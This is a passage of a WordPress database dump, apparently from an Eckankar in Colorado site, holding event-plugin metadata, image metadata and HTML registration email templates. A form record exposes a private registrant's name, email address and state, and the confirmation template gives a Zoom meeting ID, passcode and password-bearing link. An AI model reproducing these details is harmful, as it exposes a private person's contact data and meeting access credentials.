20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117382,262893,'_RTECmaxRegistrations','30'),(117383,262893,'boldgrid_hide_page_title','0'),(120854,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(120853,263177,'protect_children',''),(120851,263172,'_seq_num','116'),(120850,263172,'_form_id','21'),(120849,263172,'_field_229','a:2:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(120848,263172,'_field_228','US'),(120847,263172,'_field_227','CO'),(120846,263172,'_field_226','Arainbeau2@msn.com'),(120845,263172,'_field_225','Beeson'),(120844,263172,'_field_224','Amy'),(89031,259137,'_EventTimezoneAbbr','MDT'),(89030,259137,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(143508,265134,'mec_more_info_target','_self'),(160568,266604,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6028:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: 844 4204 1787</b><br />\r\n<b>Passcode:</b> 369369</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09\">https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:9974:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(160567,266604,'mec_fields','a:0:{}'),(160566,266604,'mec_op','a:0:{}'),(160565,266604,'mec_bfixed_fields','a:0:{}'),(103108,52324,'_RTECregistrationsDisabled','1'),(103109,52324,'_RTECdeadlineType','start'),(103110,52324,'_RTECwhoCanRegister','any'),(103111,52324,'_RTEClimitRegistrations','0'),(103112,52324,'_RTECmaxRegistrations','30'),(89007,259137,'_edit_lock','1582842962:2'),(89016,259137,'_edit_last','2'),(89004,259137,'protect_children',''),(89005,259137,'_EventOriginalParent','128619'),(89006,259137,'_dp_original','128669'),(89000,259137,'_EventCost',''),(89001,259137,'_EventURL',''),(89002,259137,'_EventTimezone','America/Denver'),(89003,259137,'_EventNextPendingRecurrence','2022-03-06 10:30:00'),(89155,259252,'_wp_attached_file','2020/02/about-background-6.jpg'),(89156,259252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1918;s:6:\"height\";i:1079;s:4:\"file\";s:30:\"2020/02/about-background-6.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"about-background-6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"about-background-6-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"about-background-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"about-background-6-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"about-background-6-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"about-background-6-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"about-background-6-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"about-background-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"about-background-6-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:30:\"about-background-6-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:30:\"about-background-6-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"about-background-6-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:30:\"about-background-6-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:30:\"about-background-6-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"about-background-6-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:30:\"about-background-6-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:31:\"about-background-6-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(89166,259252,'original-file','2020/02/about-background-6-updraft-pre-smush-original.jpg'),(89167,259252,'smush-complete','1'),(89168,259252,'smush-info','The file was compressed from 671.68 KB to 639.13 KB saving 4.85 percent using WP-Optimize'),(89169,259252,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:687800;s:12:\"smushed-size\";i:654466;s:15:\"savings-percent\";d:4.85;}'),(89172,259263,'_wp_attached_file','2020/02/about-background-8.jpg'),(89173,259263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1918;s:6:\"height\";i:787;s:4:\"file\";s:30:\"2020/02/about-background-8.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"about-background-8-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"about-background-8-1024x420.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"about-background-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"about-background-8-768x315.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"about-background-8-1536x630.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"about-background-8-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"about-background-8-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"about-background-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"about-background-8-250x103.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:103;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:30:\"about-background-8-550x226.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:30:\"about-background-8-800x328.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"about-background-8-439x180.jpg\";s:5:\"width\";i:439;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:30:\"about-background-8-731x300.jpg\";s:5:\"width\";i:731;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4: